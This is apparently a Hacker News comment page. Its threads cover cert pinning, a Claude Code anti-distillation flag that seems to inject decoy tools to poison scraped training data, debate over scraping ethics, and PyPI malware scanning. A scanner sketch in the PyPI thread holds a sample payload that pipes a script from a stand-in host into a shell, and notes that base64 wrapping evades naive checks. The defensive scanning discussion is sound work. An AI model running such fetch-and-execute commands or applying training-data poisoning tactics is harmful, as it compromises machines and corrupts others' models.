cedws's comments

Installing the CA requires jumping through some hoops, but yes, intercepting traffic for apps that don’t use cert pinning isn’t that difficult on iOS.

Apps that do use cert pinning are a whole other matter; I’ve tried unsuccessfully a few times to inspect things like banking apps. It needs a rooted device at the minimum.


So I assume the White House app doesn’t do cert pinning.

Also looked into this a long time ago… could someone tell me how to do this with cert-pinned apps?


    ANTI_DISTILLATION_CC
    
    This is Anthropic's anti-distillation defence baked into Claude Code. When enabled, it injects anti_distillation: ['fake_tools'] into every API request, which causes the server to silently slip decoy tool definitions into the model's system prompt. The goal: if someone is scraping Claude Code's API traffic to train a competing model, the poisoned training data makes that distillation attempt less useful.
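
For reference, a sketch of what such a request might look like on the wire, assuming the standard Messages API shape plus the undocumented field described above (the model id and key are placeholders):

    import json
    import urllib.request

    # Hedged sketch: the Messages API fields are documented; the
    # anti_distillation field is the undocumented opt-in described above.
    body = {
        "model": "claude-opus-4-6",  # placeholder model id
        "max_tokens": 1024,
        "messages": [{"role": "user", "content": "list files in this repo"}],
        "anti_distillation": ["fake_tools"],
    }
    req = urllib.request.Request(
        "https://api.anthropic.com/v1/messages",
        data=json.dumps(body).encode(),
        headers={
            "content-type": "application/json",
            "x-api-key": "sk-ant-REDACTED",  # placeholder credential
            "anthropic-version": "2023-06-01",
        },
    )
    # urllib.request.urlopen(req) would send it; omitted here on purpose.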

It looks like it worked, fwiw.

The Qwen 27B model distilled from Opus 4.6 has some known issues with tool use specifically: https://x.com/KyleHessling1/status/2038695344339611783

Fascinating.


I was thinking just yesterday that the research Anthropic was sharing about how easy it is to poison training data was unlikely to have been conducted out of the goodness of their heart.

Haven’t looked at the code, but is the server providing the client with a system prompt that it can use, which would contain fake tool definitions when this is enabled? What enables it? And why is the client still functional when it’s giving the server back a system prompt with fake tool definitions? Is the LLM trained to ignore those definitions?

Wonder if they’re also poisoning Sonnet or Opus directly by generating simulated agentic conversations.


Not sure, and not completely convinced of the explanation, but the way this sticks out so obviously makes it look like a honeypot to me.

Great theory. I'll dig deeper.

Claude Code has a server-side anti-distillation opt-in called fake_tools, but the local code does not show the actual mechanism.

The client sometimes sends anti_distillation: ['fake_tools'] in the request body at services/api/claude.ts:301

The client still sends its normal real tools: allTools at services/api/claude.ts:1711

If the model emits a tool name the client does not actually have, the client turns that into No such tool available errors at services/tools/StreamingToolExecutor.ts:77 and services/tools/toolExecution.ts:369
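
To illustrate that error path, a toy Python sketch (the real client is TypeScript; the names here are illustrative, not the actual implementation):

    # Any tool call whose name isn't in the local registry is answered
    # with an error instead of being executed, which is why a decoy tool,
    # if the model actually called it, would surface to the user.
    REAL_TOOLS = {
        "Read": lambda args: f"contents of {args['path']}",
    }

    def execute_tool_call(name, args):
        tool = REAL_TOOLS.get(name)
        if tool is None:
            return f"No such tool available: {name}"
        return tool(args)

    print(execute_tool_call("Read", {"path": "main.py"}))  # works
    print(execute_tool_call("DecoyTool", {}))              # visible breakage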

If Anthropic were literally appending extra normal tool definitions to the live tool set, and Claude used them, that would be user-visible breakage.

That leaves a few more plausible possibilities:

fake_tools is just the name of the server-side experiment, but the implementation is subtler than “append fake tools to the real tool list.”

or

The server may inject tool-looking text into hidden prompt context, with separate hidden instructions not to call it.

or

The server may use decoys only in an internal representation that is useful for poisoning traces/training data but not exposed as real executable tools.


We do know that Anthropic has the ability to detect when their models are being distilled, so there could be some backend mechanism that needs to be tripped to observe certain behaviour. Not possible to confirm though.

Who's we, and how do you know this?

“We” can be used to refer to people in general, and we know because Anthropic published a post called "Detecting and preventing distillation attacks" a month ago, calling out three AI labs for large-scale distillation.

https://www.anthropic.com/news/detecting-and-preventing-dist...


I like these guys less every day. The rate limits are so low that they're barely even useful as a provider.

It made me raise my eyebrows when everyone was rushing to jump to Claude because OpenAI agreed to work with the DoW. Both companies are just as shitty as each other and will resort to underhanded tactics to stay on top.

Go China to be honest. They're the most committed to open AI research and they have more interesting constraints to work under, like restricted access to NVIDIA hardware.


Why would this be in the client code though?

Paranoia. And also ironic considering their base LLM is a distillation of the web and books etc etc.

They stole everything and now they want to close the gates behind them.

"I got the loot, Steve!"

I feel like the distillation stuff will end up in court if they try to sue an American company about it. We'll see what a judge says.


You're perfectly free to scrape the web yourself and train your own model. You're not free to let Anthropic do that work for you, because they don't want you to, because it cost them a lot of time and money and secret sauce presumably filtering it for quality and other stuff.

Stole? Courts have ruled it's transformative, and it very obviously is.

AI doomerism is exhausting, and I don't even use AI that much; it's just annoying to see people who want to find any reason they can to moan.


> Stole? Courts have ruled it's transformative, and it very obviously is.

The courts have ruled that AI outputs are not copyrightable. The courts have also ruled that scraping by itself is not illegal, only maybe against a Terms of Service. Therefore, Anthropic, OpenAI, Google, etc. have no legal claim to any proprietary protections of their model outputs.

So we have two things that are true:

1) Anthropic (certainly) violated numerous TOS by scraping all of the internet, not just public content.

2) Scraping Anthropic's model outputs is no different than what Anthropic already did. Only a TOS violation.


> 2) Scraping Anthropic's model outputs is no different than what Anthropic already did. Only a TOS violation.

Regardless of whether LLM training amounts to theft, thieves are still allowed to put locks on their own doors.


>The courts have ruled that AI outputs are not copyrightable.

"not copyrightable" doesn't imply they can't frustrate attempts to scrape data.


Nobody is saying they can't try to stop you themselves. That's where the Terms of Service violation part comes in. They can cancel your account, block your IP, etc. They just can't legally stop you by, for instance, compelling a judge to order you to stop.

> They just can't legally stop you by, for instance, compelling a judge to order you to stop.

They probably can, actually. TOS are legally binding.

More likely they would block you rather than pursuing legal avenues but they certainly could.


The Supreme Court already ruled on this. Scraping public data, or data that you are authorized to access, is not a violation of the Computer Fraud and Abuse Act.

Now, if you try to get around attempts to block your access, then yes you could be in legal trouble. But that's not what is happening here. These are people/companies that have Claude accounts in good standing and are authorized by Anthropic to access the data.

Nobody is saying that Anthropic can't just block them though, and they are certainly trying.


I didn’t say anything about the Computer Fraud and Abuse Act. TOS are legally binding contracts in their own right if implemented correctly.

> You're perfectly free to scrape the web yourself and train your own model.

Actually, not anymore as a result of OpenAI and Anthropic's scraping. For example, Reddit came down hard on access to their APIs as a response to ChatGPT's release and the news that LLMs were built atop of scraping the open web. Most of the web today is not as open as before as a result of scraping for LLM data. So, no, no one is perfectly free to scrape the web anymore because open access is dying.


"...free to scrape the web yourself and train your own model."

Yes, rich and poor are equally forbidden from sleeping under bridges.


Meaning what? The poor get to sleep in the guest room of the rich guy's house because muh inequality?

Anthropic paid a lot of money for a moat and want to guard it. It is not wrong, in any sense of the word, for them to do so.


Rich people aren't going to find themselves needing to sleep under a bridge, so the law really only exists as a constraint on the poor. Duh. The flex that "well, a rich guy couldn't do it either" is A) at best a myopic misunderstanding perpetuated by out-of-touch people and B) hopelessly naive, because any punishment for the rich guy actually sleeping under a bridge is so laughably small it may as well not even exist. Hence the whole bit of "a legal system to keep thee accountable, but not me".

Okay, you explained what Anatole France meant, which is probably helpful for those few who didn't get it from the quote itself. Perhaps now you can explain what on earth this has to do with Anthropic not wanting to let other for-profit businesses mooch off its investment of time, brainpower and money?

You explained what “rich and poor are equally forbidden from sleeping under bridges” means, but not what this has to do with the statement that one is free to do their own scraping and training, which I’m pretty sure is what kspacewalk was asking.

Wut? They did exactly the same thing!

Try this: If you want to train a model, you’re free to write your own books and websites to feed into it. You’re not free to let others do that work for you because they don’t want you to, because it cost them a lot of time and money and secret sauce presumably filtering it for quality and other stuff.


[flagged]


[flagged]


Yeah, these folks' skin is often very thin. One poke too hard and it's "whatever" and them scuttling off. Really hope there is a day they introspect.

I introspect all the time. I just disagree with you so I have thin skin? Lol.

I think it's transformative. I also think that it's a net positive for society. I lastly think that using freely available, public information is totally fair game. Piracy not so much, but it's water under the bridge.

I hope you introspect some day, too, and realize it's acceptable for people to have different views than you. That's why I don't care; you aren't going to change my mind and I can't change yours either, so it's moot and I don't care to argue about it further.


You had appeared to scuttle off, but alas, I was wrong (and sorry to imply you are a crab of some sort); however, your follow-up comment on not changing minds might be a tad shell-ish. I'm actually open-minded on the issue, and these are major issues of our time. I'm personally impacted by this, and it does make me wonder "will I write X thing again", which is a very hard question to answer, frankly. When you see your works presented in summary on search, and a major decline in traffic, you really do think about that. It impacts my ability to make money as I once did prior to 2024 (when it really hit), without doubt. Edit/spelling

Guess who else spent a lot of time and money and secret sauce?

Do you hear the words coming out of your mouth?


Lol; like heck we are. Try scraping the NYTimes at LLM scale. You can time how quickly you’ll get 420’ed or, at worst, hit with a C&D.

(429'ed, I meant)

Your selective respect for work is a glaring double standard. The effort to produce the original content they scraped is orders of magnitude bigger than what it took to train the model, so if that wasn't enough to protect the authors from Anthropic, it shouldn't be enough to protect Anthropic from people distilling their models.

Your legal argument is all over the place as well. What is more relevant here: what the courts ruled, or what you consider obvious? How is distillation less transformative than scraping? How does the courts ruling that scraping to train models is legal relate to distillation?

Nobody is scoring you on neutrality points for not using AI much, and calling this doomerism is just a thought-terminating cliche that refuses to engage with the comment you're replying to.

In fact, your comment is not engaging with anything at all; you're vaguely gesturing towards potential arguments without making them. If you find discussing this exhausting then don't, but also don't flood the comments with low-effort whining.


It is transformative, but if I make a bunch of requests to their API and use the responses to distill my own model, that is also transformative.

Reminds me of `don't look up` a bit. There clearly is an imbalance with regard to licenses with model providers, not even talking about knowledge extraction (yes, younger people don't learn properly now, and older generations forget), shortly before the rug-pull happens in the form of accessibility for people who aren't rich.

Let's talk ethics, not law. Why is it okay for these companies to pirate books and scrape the entire web and offer synthesized summaries of all of it, lowering traffic and revenue for countless websites and professions of experts, but it is not okay for others to try to do the same to an AI model?

Is the work of others less valid than the work of a model?


>Why is it okay for these companies to pirate books

Courts have ruled it's not, and I don't think anyone is arguing it's okay.

>but it is not okay for others to try to do the same to an AI model?

The steelman version is that it's okay to do it once you've acquired the data somehow, but that doesn't mean Anthropic can't set up roadblocks to frustrate you.


I don’t see why it’s not ok to do that to an AI model. Or are you asking why they don’t want you to do it?

I don't think anyone's saying it's not okay - I think the point is that Anthropic has every right to create safeguards against it if they want to - just like the people publishing other information are free to do the same.

And everyone is free to consume all the free information.



I just rewatched that scene last night on YouTube. Maybe this is the universe telling me to watch the whole movie again...

It's cool to see Noah Wyle getting his due these days (The Pitt).


[flagged]


Not every lawsuit goes to court, or results in a decision. I'm sure you know that.

You should ask Claude what a lawsuit is. Or perhaps you mean “trial” and not “court”?

Not every lawsuit that is heard by a court goes to trial.

Right. This was strongly implied by my comment.

I feel like I'm talking to Claude right now. Am I?

This is the new “I can’t defend my statement online” retort, huh?

“Well I might be wrong but at least I’m not AI like YOU!”


Ever heard the phrase "settled out of court"? A lot of lawsuits are settled even before a court clerk processes the paperwork.

Settled out of court does not mean the lawsuit never went to court; it means the settlement happened outside of court. Every lawsuit has to go to court: that's how you file a lawsuit. If it isn't sent to a court, it's just words in a document.

A lawsuit with no paperwork filed is not a lawsuit. That’s just an agreement.

Again, you seem to be conflating lawsuit with trial.


next you should explain idioms

It's not really paranoia if it's happening a lot. They wrote a blog post calling several major Chinese AI companies out for distillation.[0] Perhaps it is ironic, but it's within their rights to protect their business, like how they prohibit using Claude Code to make your own Claude Code.[1]

[0]: https://www.anthropic.com/news/detecting-and-preventing-dist... [1]: https://news.ycombinator.com/item?id=46578701


And they conveniently left out that they themselves distilled DeepSeek for Chinese content into their model...

Their business shouldn't exist. It was predicated on non-permissive IP theft. They may have found a judge willing to cop to it not being so, but the rest of the public knows the real score. And most problematically for them, that means the subset of hackerdom that lives by tit-for-tat. One should beware of pissing off gray-hats. It's a surefire way to find yourself heading for bad times.

I would say not all that ironic. Book publishers, Reddit, Stackoverflow, etc., tried their best to attract customers while not letting others steal their work. Now Anthropic is doing the same.

Unfortunately (for the publishers, at least) it didn't work to stop Anthropic, and Anthropic's attempts to prevent others will not work either; there has been much distillation already.

The problem of letting humans read your work but not bots is just impossible to solve perfectly. The more you restrict bots, the more you end up restricting humans, and those humans will go use a competitor when they become pissed off.


It's really just tech culture like HN that obsesses over solving problems perfectly. From seat belts to DRM to deodorant, most of the world is satisfied with mitigating problems.

It is absolutely not paranoia. People are distilling Claude Code all the time.

That isn't irony, it's hypocrisy.

No, it isn't. It's a competition; making moves that benefit you and attempting to deprive your opponent of the same move is just called competing.

Wait, are you saying that it's not hypocritical for my chess opponent to try to protect their king while trying to kill mine? :mind-blown:

Tech people are funny, with these takes that businesses do/should adhere to absolute platonic ideals and follow them blindly regardless of context.


No, it's ethical people pointing out that if you toss aside ethics for success at all costs, you aren't going to find any sympathy when people start doing the same thing back to you. Live by the sword, die by the sword, as they say.

There is a reason we don't do these things. That reason is that it makes the world a worse place for everyone. If you are so incredibly out of touch with any semblance of ethics at all, mayhaps you are just a little bit part of the problem.


The funny thing about ethics is there is no absolute, which makes some people uncomfortable. Is it ethical to slice someone with a knife? Does it depend on whether you're a surgeon or not?

Absolutism + reductionism leads to this kind of nonsense. It is possible that people can disagree about (re)use of culture, including music and print. Therefore it is possible for nuance and context to matter.

Life is a lot easier if you subscribe to an "anyone who disagrees with me on any topic must have no ethics whatsoever and is a BAD person" view. But it's really not an especially mature worldview.


The categorical imperative and the Golden Rule, or as you may know it from game theory, "tit-for-tat", say "hi". The beautiful thing about ethics is that we philosophers intentionally teach it descriptively, but encourage one to choose their own based on context invariance. What this does is create an effective litmus test for detecting shitty people/behavior. Your grasping on for dear life to "there are no absolutes" is an act of self-soothing on your own part, as you're trying to rationalize your own behavior to provide an ego crumple zone. I, on the other hand, don't intend to leave you that option. That you're having to do it is a neon sign of your own unethicality in this matter. We get to have nice things when people moderate themselves (we tolerate eventual free access to everything as long as the people who don't want to pay for it don't go and try to replace us economically at scale). When people abuse that (scrape the Internet, try to sell work product in a way that jeopardizes the environment we create in), the nice thing starts going away, and you've made the world worse.

Welcome to life, bucko. Stop being a shitty person and get with the program so we have something to leave behind that has a chance of not making us villains in the eyes of those we eventually leave behind. The trick is doing things the harder way because it's the right way to do it, not doing it the wrong way because you're pretty sure you can get away with it.

But you're already ethically compromised, so I don't really expect this to do any good, except maybe to make the part of you that you pointedly ignore start to stir, assuming you haven't completely given yourself up to a life of ne'er-do-wellry. Enjoy the enantiodromia. Failing that, karma's a bitch.


It's definitely still hypocrisy.

The Golden Horde didn’t want opponents to conquer their territory. An irony if you think about it—

That’s capitalism

As opposed to the rent-seeking copyright industry where 1% goes to the original creators if you're lucky.

That’s capitalism too

Technically state capitalism, since it's an industry created as a result of Congress regulating commerce with aggressive IP laws (aka rent-seeking).

Where can I see an example of any other kind of capitalism?

Capitalism is always underpinned by a strong legal system, which is why most criticism is about constraining growth in legislation, not killing off interference outright. Copyright law is a good example of a law that made sense in its original form but turned into a monster with scope creep.

Although, if we're being realpolitik, every time government interference grows in scope and corrupts markets, capitalism still gets blamed and people call for more government to fix it (see: housing). So the capitalism vs state capitalism distinction isn't very meaningful in practice.


As opposed to what economic system that doesn't do this?

I watched a talk from Bjarne Stroustrup at CppCon about safety, and it was pretty secondhand-embarrassing watching him try to pretend C++ has always been safe and that safety mattered to them all along before Rust came along.

Well, there has been a long campaign against manual memory management, from well before Rust was a thing. And along with that, a push for less use of raw pointers, fewer index loops, etc.: all measures which, when adopted, reduce memory safety hazards significantly. Following the Core Guidelines also helps, as does using spans. Compiler warnings have improved, as has static analysis, also in a long process preceding Rust.

Of course, this is not completely guaranteed safety - but safety has certainly mattered.


>Following the Core Guidelines also helps

Yes, this is what Stroustrup said, and it makes me laugh. IIRC he phrased it with more of a 'we had safety before Rust' attitude. It also misses the point: safety shouldn't be opt-in or require memorising a rulebook. If safety is that easy in C++, why is everyone still sticking their hand in the shredder?


You're "moving the goal posts" of this thread. Safety has mattered - in C++ and in other languages as well, e.g. with MISRA C.

As for the Core Guidelines: most of them are not about safety, and they are not to be memorized; they're a resource to consult when relevant, and something to base static analysis on.


Because they don’t work with it. It’s as simple as that. I don’t trust people who don’t work with a terminal these days; the further they get from a terminal, the less grounded their views are. They rely on hearsay and CEO hype. To make matters worse, they say whatever they think will earn them a bonus/promotion, which leads to a cascade of BS down the chain.

I seriously doubt Satya Nadella is sitting down for hours a day to use Copilot to draft detailed documents. He's being fed fantastical stories by his lackeys telling him what he wants to hear.


I've seen this misconception so many times in open source projects - commits just bumping the version in go.mod to 'get the latest performance and security improvements.' Like no, that's not how it works, you just made your code compile with fewer compiler versions for no reason.

I think the directive could have been named better though, maybe something like min_version.
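
For anyone unfamiliar, a sketch of what the directive actually means (module path hypothetical):

    module example.com/hello  // hypothetical module path

    // A floor, not an upgrade knob: the go directive declares the minimum
    // Go language version needed to build this module. Raising it doesn't
    // pull in performance or security fixes; it only excludes older toolchains.
    go 1.22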


Are you able to share if there's a general trend behind the outages? Do you often hit capacity, or do you budget to have headroom?

Yes, the general trend is the unprecedented growth that we've seen. Typically one would have some time in advance to re-engineer the systems to support the increase in traffic and users. But we're dealing with very compressed timelines, and while most of the time we're able to fix the issues beforehand, sometimes we have to do it in production. Sorry for that.

The US under Trump is behaving exactly like a country with intentions of damaging the Western order and antagonising enemies to open new front lines. I think writing off Trump's actions as stupid is wrong; he's malicious.

He's also making new enemies among his own allies. That can't just be a side effect of how efficiently he's doing it.

GitHub, npm, PyPI, and other package registries should consider exposing a firehose to allow people to do realtime security analysis of events. There are definitely scanners that would have caught this attack immediately; they just need a way to be informed of updates.

PyPI does exactly that, and it's been very effective. Security partners can scan packages and use the invite-only API to report them: https://blog.pypi.org/posts/2024-03-06-malware-reporting-evo...

PyPI is pretty best-in-class here and I think that they should be seen as the example for others to pursue.

The client side tooling needs work, but that's a major effort in and of itself.


It is not effective if it just takes a simple base64 encode to bypass. If Claude is trivially able to find that it is malicious, then PyPI is being negligent.
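
To illustrate: a toy scanner (not PyPI's actual tooling) that defeats the trivial base64 wrap by decoding embedded base64 literals before signature matching:

    import base64
    import re

    # Plain signature matching is defeated by base64-wrapping the payload;
    # decoding embedded base64 runs before matching closes that one gap.
    SUSPICIOUS = [b"os.system", b"curl http"]
    B64_RUN = re.compile(rb"[A-Za-z0-9+/]{24,}={0,2}")

    def scan(source: bytes) -> bool:
        blobs = [source]
        for run in B64_RUN.findall(source):
            try:
                blobs.append(base64.b64decode(run, validate=True))
            except Exception:
                pass  # not actually base64, ignore
        return any(sig in blob for blob in blobs for sig in SUSPICIOUS)

    payload = b"import os; os.system('curl http://evil.example/x | sh')"
    wrapped = b"exec(__import__('base64').b64decode('%s'))" % base64.b64encode(payload)
    assert scan(payload)  # caught in plaintext
    assert scan(wrapped)  # caught only via the decode pass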

The package in question was live for 46 minutes. It generally takes longer than that for security partners to scan and flag packages.

PyPI doesn't block package uploads awaiting security scanning - that would be a bad idea for a number of reasons, most notably (in my opinion) that it would be making promises that PyPI couldn't keep and lull people into a false sense of security.


It should not let people download unscanned dependencies without a warning and asking the user to override and use a potentially insecure package. If a security bug is critical enough to need to bypass this (spoiler: realistically it is not actually that bad for a security fix to be delayed), they can work with the PyPI security team to do a quicker manual review of the change.

The whole point is that this would give a false sense of security. Scanned dependencies aren't secure, they're just scanned by some tools which might catch some issues. If you care about security, you need to run those same scans on your side, perhaps with many more rules enabled, perhaps with multiple tools. PyPI, understandably, does NOT want to take any steps to make it seem like they promise their repo doesn't contain any malware. They make various best effort attempts to keep it that way, but the responsibility ultimately falls on you, not on them.

Sadly I still worry about that. An install fails once, you hard-code the --force flag in all your CI/CD jobs, and we are back in the same place again. I am not sure what the answer is, though; problems...

Adding a hardcoded flag is not the same as asking the user if they want potential malware. If CI/CD is broken they should revert the change to pinned dependencies instead of trying to install a bleeding edge version of a new dependency that hasn't been scanned yet.

I don't understand why this would be an issue. Firstly, you could just pin your dependencies, but even if you don't, couldn't the default behaviour be to just install the newest scanned version?

What happens then if the security scanners say something is safe and it turns out not to be?

I don't think PyPI should be in the business of saying if a piece of software is safe to install or not.


Then it will be downloadable, and then it's up to your own security scanners to catch it. If you find it, it should be reported to PyPI, and then the scanner should be improved to catch that kind of bypass the next time it comes around. In such a world I don't think PyPI is acting negligently.

That's really not very different from what we have right now. PyPI works with scanners which catch a whole lot of malware and are getting better all the time.

I think PyPI suggesting that software is safe would be a step down from this, because it makes promises that PyPI can't keep and would encourage a false sense of security.


It's less about suggesting that it's safe, and more about avoiding pushing out arbitrary code to thousands of people without checking if you are pushing out malicious code to all of those people. It is the responsible thing to do.

>That's really not very different from what we have right now.

What I'm advocating for is different enough to have stopped this malware from being pushed out to a bunch of people which at the very least would raise the bar of pulling off such an attack.


I realize this is controversial (and many Python folks would claim unethical). But I keep wondering if requiring a small payment for registering and updating packages would help. The money could go to maintaining PyPI as well as automated AI analysis. Folks who really couldn't afford it could apply for sponsorship.

Very much not speaking for the PSF here, but my personal opinion on why that wouldn't work is that Python is a global language and collecting fees on a global basis is inherently difficult - and we don't want to discriminate against people in countries where the payment infrastructure is hard to support.

PyPI has paid organization accounts now which are beginning to form a meaningful revenue stream: https://docs.pypi.org/organization-accounts/pricing-and-paym...

Plus a small fee wouldn't deter malware authors, who would likely have easy access to stolen credit cards - which would expose PyPI to the chargebacks and fraudulent transactions world as well!


I don't think people want to pay for that.

If PyPI charges money, Python libraries will suddenly have a lot of "you can 'uv add git+https://github.com/project/library'" instead of 'uv add library'.

I also don't think it would stop this attack, where a token was stolen.

If someone's generating PyPI package releases from CI, they're going to register a credit card on their account, make it so CI can automatically charge it, and when the CI token is stolen it can push an update on the real package owner's dime, not the attacker's, so it's not a deterrent.

Also, the iOS App Store is an okay counterexample. It charges $100/year for a developer account, but still has its share of malware (certainly more than the totally free Debian software repository).


TBH there isn't much difference in pulling directly from GH.

Though I do like your Apple counterexample.


Not speaking on behalf of PSF, but to me, it looks like a no-go, as some packages are maintained, legitimately, by people from sanctioned countries, with no way to pay any amount outside their country.

I don't see how this would help in the least: what kind of criminal would be dissuaded by paying a small fee to set an elaborate scheme such as this in motion? This is not a spamming attack where the sheer volume would be costly. It doesn't even help to get a credit card on file, since they can use stolen CC numbers.

It's far more likely that hobbyists will be hurt than someone that can just write off the cost as a small expense for their criminal scheme.


I suspect that for a nation-state type threat actor, this wouldn’t be much of a deterrent. Any type of reputation system like this would work to a point until motivated threat actors find a way to game it.

Would you happen to know where the latency comes from between upload and scanning? Would more resources (more security scanner runners consuming the scanner queue faster) solve this? Trying to understand if there are inherent process limitations or if a donation for this compute would close the gap.

(software supply chain security is a component of my work)


He said, "PyPI doesn't block upload on scanning"; that's part of where the latency comes from. The other part is simply the sheer mass of uploads, and that there's no money in doing it super quickly.

I agree it's a bad idea to do so, since security scanning is inherently a cat-and-mouse game.

Let's hypothetically say PyPI did block upload on passing a security scan. The attacker now simply creates their own PyPI test package ahead of time, uploads sample malicious payloads with additional layers of obfuscation until one passes the scan, and then uses that payload in the real attack.

PyPI would also probably open-source any security scanning code it adds as part of upload (as it should), so the attacker could even just do it locally.


I suppose my argument is that PyPI could offer package owners the option to block downloads until a security scan is complete (if scanning will always take ~45-60 minutes), and if money is a problem, money can solve the scanning latency. Our org scans all packages ingested into artifact storage and requires dependency pinning, and would continue to do so, but more options (when cheap) are sometimes better imho. Also, not everyone has enterprise resources for managing this risk. I agree it is "cat and mouse" or "whack-a-mole" and always will be (i.e. building and maintaining systems of risk mitigation and reduction). We don't skip security scanning simply because adversaries are always improving, right? We collectively slow attackers down, when possible.

("slow is smooth, smooth is fast")


I don't know that myself, but Mike Fiedler is the person to reach out to; he runs security for PyPI and is very responsive. security@pypi.org

Thanks, TIL.

So I've been thinking about this a lot since it happened. I've already added dependency cooldowns https://nesbitt.io/2026/03/04/package-managers-need-to-cool-... to every part of our monorepo. The obvious next thought is "am I just dumping the responsibility onto the next person along"? But as you point out it just needs to give automated scanners enough time to pick up on obvious signs like the .pth file in this case.
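
If it helps anyone, here's roughly what a cooldown check can look like for the Python side: a toy sketch against PyPI's public JSON metadata endpoint (not the tooling from the post; the package/version below are arbitrary):

    import datetime as dt
    import json
    import urllib.request

    COOLDOWN = dt.timedelta(days=7)

    def old_enough(package: str, version: str) -> bool:
        # Public metadata endpoint: https://pypi.org/pypi/<name>/<version>/json
        url = f"https://pypi.org/pypi/{package}/{version}/json"
        with urllib.request.urlopen(url) as resp:
            meta = json.load(resp)
        uploads = [
            dt.datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
            for f in meta["urls"]
        ]
        if not uploads:
            return False  # no files uploaded; nothing to adopt
        # Only adopt a release once its newest file has aged past the cooldown.
        return dt.datetime.now(dt.timezone.utc) - max(uploads) >= COOLDOWN

    print(old_enough("requests", "2.32.3"))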

It is in a sense dumping responsibility, but there’s a legion of security companies out there scanning for attacks all the time now to prove their products. They’re kind of doing a public service and you’re giving them a chance to catch attacks first. This is why I think dep cooldowns are great.

npm has a feed of package changes you can poll if you're interested.

GitHub has a firehose of events and there's a public BigQuery dataset built from that, with some lag.
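
A minimal poller might look like this, assuming the CouchDB-style _changes feed npm has historically exposed at replicate.npmjs.com (access to it has been reshaped over the years, so treat the endpoint itself as an assumption):

    import json
    import time
    import urllib.request

    FEED = "https://replicate.npmjs.com/_changes"  # assumed endpoint, see above

    def poll(since):
        with urllib.request.urlopen(f"{FEED}?since={since}&limit=100") as resp:
            body = json.load(resp)
        for change in body.get("results", []):
            print("changed:", change["id"])  # package name to go scan
        return body.get("last_seq", since)

    seq = "now"  # CouchDB convention: start from the current sequence
    while True:
        seq = poll(seq)
        time.sleep(15)  # crude polling; a real scanner would stream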


I feel like they should be legally responsible for providing scanning infrastructure for this sort of thing. The potential economic damage can be catastrophic. I don't think this is the end of the litellm story either, given that 47k+ people were infected.

It's not about expectation of work (well, there's some entitled people sure.)

It's about throwing away the effort the reporter put into filing the issue. Stale bots disincentivise good-quality issues, make them less discoverable, and create the burden of having to collate discussion across N previously raised issues about the same thing.

Bug reports and FRs are also a form of work. They might have a selfish motive, but they're still raised with the intention of enriching the software in some way.


It's like playing The Witness. Somebody should set LLMs loose on that.

Or more appropriately - The Talos Principle.

